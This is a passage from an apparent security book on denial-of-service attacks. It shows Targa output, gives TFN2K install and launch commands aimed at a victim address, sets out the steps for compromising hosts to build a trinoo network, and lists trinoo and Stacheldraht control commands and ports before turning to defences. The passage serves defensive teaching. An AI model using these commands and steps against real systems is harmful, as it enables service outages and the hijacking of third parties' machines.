Hackers Beware

208.246.68.48 [ $$$$$$$$$$$$$$$$-----

............................................

..............................................................

..................

..............................................................

..................

..............................................................

..................

..............................................................

..................

..............................................................

..................

........................................................######

###############&&&

&&&&&&&&&&&&&&&&&&%%%%%%%%%%%%%%%%%%%%%connect():

* ]

-all done-

[root@seclinux1 eric]#

Because we gave it an option of t0, we told the program to try every single exploit until it was successful at crashing the target host. As the program runs and tries a different exploit, the cursor changes to a different symbol.

This exploit was run against a Windows machine and crashed it in around 2 minutes. UNIX systems have similar vulnerabilities and can be crashed in approximately the same amount of time. If you haven’t already realized it, you should start to see the power of Denial of Service attacks. If this has not scared you enough, let’s take a look at an even more powerful type of program, Distributed Denial of Service (DDOS) tools

Tools for Running DDOS Attacks

With the turn of the century, it seemed like most companies were concerned with Y2K problems and whether we would still have electricity to run computers when January 1, 2000 hit. As everyone was worrying about this problem, there was a new problem brewing—attackers were building tools that could launch devastating Distributed Denial of Service attacks. The first main attack took place in February of 2000, where several large companies were taken offline. There are a large number of tools that are available on the Internet for implementing these types of attacks. Several can be found at http://packetstorm.securify.com/distributed.

The following are the main tools in chronological order: trinoo, tribal flood network (TFN), stacheldraht, shaft, tribal flood network 2000 (TFN2K), and mstream. They all have similar functionality in terms of how they launch an attack. In this section, we first cover TFN2K because it is very

feature-rich, it has a lot of capabilities, and it is built on TFN. We then cover trinoo and stacheldraht. Mstream, although it was one of the newest, released programs, has fairly limited features and performs the same type of attacks as TFN2K.

For additional details on the various DDOS attack tools, see David Dittrich’s writeups of the attacks available from http://packetstorm.securify.com/distributed. David has written excellent, extensive papers on the tools covered in this section.

Tribal Flood Network 2000 (TFN2K)

TFN2K is a program that can be viewed as an enhancement to Targa. It was written by the same person, Mixter, and can be downloaded from the same site: http://packetstorm.securify.com. It runs the same DOS attacks as Targa plus an additional five exploits. In addition, it is a DDOS tool, which means it can run in a distributed mode where several machines all across the Internet attack a single machine or network.

Installing TFN2K

Because TFN2K is a DDOS application and runs in a distributed mode, there are two main pieces to the program: a client module and a server module. The client module is the piece that controls the servers; it tells the servers when to attack and with what exploit. The server runs on a machine in listening mode and waits to get commands from the client. To install the program, the program first has to be uncompressed, and then it has to be compiled. To uncompress the program, type tar –xvf tfn2k.tar. To compile the program, type make all. At this point, both the client and server components have been compiled and the program can be run. Remember, a machine can function as both a client and server.

Running TFN2K

To run TFN2K, you first have to start up the server daemons, so that the client has a server to which it can connect. In this case, we are going to run the client and server on the same machine. To start up the server, type the following commands from a terminal window:

[root@seclinux1 tfn2k]# ./td

Now that the server is running, you can start up the client to launch an attack. To find out the options available with TFN2K, type ./tfn from a terminal window and the following is displayed:

As you can see, TFN2K has all the attacks that Targa has plus some additional ones, which are mainly several different types of flooding attacks. At this point, we are going to run an attack from machine 10.246.68.39 (where both the server and client are running) against a victim machine 10.246.68.48 using a mixed flood attack. The following is the command to launch the attack:

[root@seclinux1 tfn2k]# ./tfn -h 208.246.68.39 –c8 -i 208.246.68.48

At this point, the attack is being run against the victim host. The following is the output from TCPdump to show the flooding attack:

To stop the attack, type the following command:

[root@seclinux1 tfn2k]# ./tfn -h 208.246.68.39 -c0

Password verification:

Sending out packets: . [root@seclinux1 tfn2k]#

It is important to note that to start and stop a TFN2K attack, the user of the program must supply a password. The password is supplied when the program is installed.

An additional important fact to point out is that TFN2K is very stealthy. It does several things that make it harder to detect on a network. For example, all communication between the client and the server are sent using ICMP_ECHO REPLY packets. This is harder to detect because port numbers are not used. So, even if you run a port scanner on a regular basis, you would not be able to detect that your system is being used as a TFN2K server.

Trinoo

Trinoo is one of the first mainstream tools to be released and, therefore, has scaled back functionality compared to TFN2K. TFN2k is very stealthy because it uses ICMP, so there are no ports to detect on a compromised machined. Trinoo uses TCP and UDP, so if a company is running port scanner on a regular basis, like they should be, this program is easier to detect. The following are the ports it uses:

•Attacker to master: 27665/tcp

•Master to daemon: 27444/udp

•Daemon to master: 31335/udp

With trinoo, daemons reside on the systems that actually launch the attack, and masters control the daemon systems.

Back in August of 1999, a trinoo network of over 200 computers was responsible for bringing down the University of Minnesota’s network for over two days.

Using Trinoo to Attack a System

The following are the typical steps an attacker takes when using trinoo to compromise a network and setup a trinoo daemon, which can be used to

launch DDOS attacks against other systems. Most of these steps are typical for any type of DDOS tool covered in this section.

1.A potential victim or a set of victim computers needs to be identified. First, these are the computers that are going to be used to launch the attack, so they should be computers from diverse networks or IP addresses. Using a wide range of IP addresses makes it much harder for a target to block the addresses. Second, the computers must be connected to a large pipe that has a large amount of bandwidth. This is so the machine can send a lot of packets through the Internet against a target machine. Third, the machine should be fairly powerful and connected to a network that does not have good security. This is necessary not only for setting up the software, but so the company will not notice when the attacks begin. Finally, a program such as nmap should run against the system to validate the operating system and to make sure it has vulnerable ports that can be compromised. In most cases, operating systems such as Solaris and Linux are the machines attackers go after.

2.Now that the victims have been identified, the attacker must find a way to compromise a victim’s machine, so he can setup the DDOS software on the system. Remember, these DDOS tools cannot be used to gain access to a system. Root access must be gained another way, so that the DDOS daemons can be setup on the compromised machine. A common way to compromise a victim’s machine is through a variety of buffer overflow attacks, which are discussed in Chapter 7, “Buffer Overflow Attacks”.

3.After a set of machines has been compromised, the DDOS software must be installed on each machine. After all the software is configured, a couple of machines need to be setup as masters to control the daemons. Brief tests should be run to make sure everything is working properly.

4.At this point, the trinoo or DDOS network is setup and ready to attack a target.

It is important to remember that from an attackers standpoint, most of these steps can be automated with scripts, so that they can run in a very short period of time.

Running Trinoo

After trinoo is installed on a set of machines, there are a set of commands used to control the system. There are actually two sets of commands—one for the master, which is what the attacker interfaces with, and one for the daemon. The master communicates with the daemons, and the daemons actually launch the attack against a target. These commands will help give you an idea of the capability and power of these programs.

Controlling the Master

The following are the commands used to control the master:

•Die—Shuts down the master

•Quit—Logs off of the master

•Mtimer N—Sets the Denial of Service time to n number of seconds. The value can be between 1 and 1999, if the value is less than one, it defaults to 300, and if it is greater than 2000, it defaults to 500.

•Dos IP—Launches a Denial of Service attack against the specified IP address

•Die pass—Disables all broadcast hosts

•Mping—Sends a ping to every active host on the broadcast address

•Mdos <ip1:ip2:ip3>—Similar to DOS IP, but it sends multiple denials of service attack commands to each host.

•Info—Displays the version number and information about the program

•Msize—Sets the size of the buffer used during the denials of service attacks

•Nslookup host—Performs a name server lookup of the specified host

•Killdead—Sends a message to all hosts with the goal of finding hosts that do not respond and removing them from the list

•Usebackup—Switches the program to use the file created by the killdead command, which contains only the active hosts

•Bcast—Lists all active hosts

•Help [cmd]—Specifies additional information about a given command

•Mstop—Attempts to stop a Denial of Service attack. This feature is listed in the help command, but it is not currently implemented.

Controlling the Daemon

The following are some of the commands used to access the trinoo daemons:

•aaa pass IP—Perform a Denial of Service attack against the

specified IP address

•bbb pass N—Sets the time limit for the Denial of Service attack

•d1e pass—Used to shut down the daemons

•rsz N—Sets the size of the buffer that is used for the Denial of Service attacks

•xyz pass 123:ip1:ip2:ip3—Performs Denial of Service attacks against multiple IP addresses

As you can see, trinoo performs the same basic functions as the TFN2K, but it is not as stealthy because it uses ports for communication.

Stacheldraht

Stacheldraht is another DDOS tool, which combines the features of TFN and trinoo, but adds some additional features, such as encrypted communication between the components and automatic update of the daemons. As covered previously, TFN uses ICMP to communicate and trinoo uses UDP; Stacheldraht uses TCP and ICMP on the following ports:

•Client to handler— 16660 TCP

•Handler to and from agents— 65000 TCP, ICMP ECHO_REPLY

With Stacheldraht, the attackers interface with the handlers, and the handlers control the agents. The agents are the systems actually launching the attack. Because Stacheldraht has similar functionality to the programs already covered, it is not be described in detail, but it was included for completeness.

Preventing Denial of Service Attacks

Due to the power of DOS attacks and the way they work, there is nothing that can be done to prevent a DOS attack entirely. Some things can be done to minimize the chances, but even with all the proper safeguards in place, a company can still be vulnerable. If you do not believe me, you might want to ask some of the companies that were taken offline by DDOS attacks in February of 2000. The following are some things a company can do to minimize its chances of having successful DOS or DDOS attacks launched against them:

•Effective, robust design

•Bandwidth limitations

•Keep systems patched

•Run the least amount of services

•Allow only necessary traffic

•Block IP addresses

Effective Robust Design

The more redundancy and robustness that is built into a site, the better off it is. If a company has a mission-critical web site that users have to connect to over the Internet, and there is a single connection with a single router, and the server is running on a single machine—this is not a robust design. In this case, the attacker can launch a DOS attack against either the router or the server and take the mission-critical application offline. Ideally, a company should not only have multiple connections to the

Internet, but connections from multiple geographic regions. For example, if a company has multiple Internet connections going into the same building, and there is a fire, both connections would be taken out at the same time. If a company has its main office on the west coast, then they should have a small office on the east coast that has Internet connections where all traffic can be re-routed if there is a problem. The same rule goes for services. The more services a company has in different locations with different IP’s, the harder it is for an attack to locate and target all the machines simultaneously.

The amount of redundancy a company has depends on the amount of time and money a company is willing to spend to protect against DOS attacks. Remember how a DOS attack works—an attacker either crashes a machine or uses up all the resources. Therefore, the more machines and connections a company has, the harder it is for an attacker to use DOS attacks effectively.

Bandwidth Limitations

With Denial of Service attacks, an attack against a single protocol can use up all a company’s bandwidth and, therefore, deny service to legitimate users. For example, if an attacker can flood your network with port 25 traffic, the attacker can use up all a company’s bandwidth, so that someone trying to connect to port 80 is denied access. One way to combat this is to limit your bandwidth based on protocol. For example, port 25 traffic can only use 25 percent of the bandwidth and port 80 traffic can only use 50 percent of the bandwidth.

The key thing to remember with any of these solutions is that they are not perfect, and they can be defeated. For example, to defeat this, an attacker could launch two Denial of Service attacks—one against port 25 and one against port 80. What we are trying to show you is that there is no silver bullet or single solution that will protect your company. Defense in depth is key. You only have a chance of withstanding an attack by having multiple defense mechanisms protecting your network.

Keep Systems Patched

When a new DOS attack comes out that crashes a machine, vendors are usually quick about identifying the problem and releasing a patch. So, if a company stays up to speed on the latest patches and applies them on a regular basis, then its chance of being hit by a DOS attack that crashes its machine is minimized. Remember, this does not protect against DOS attacks that use up all a company’s resources. The only way to protect against that is to have a redundant, robust design for your network. You should also remember to always test a patch before it is applied to a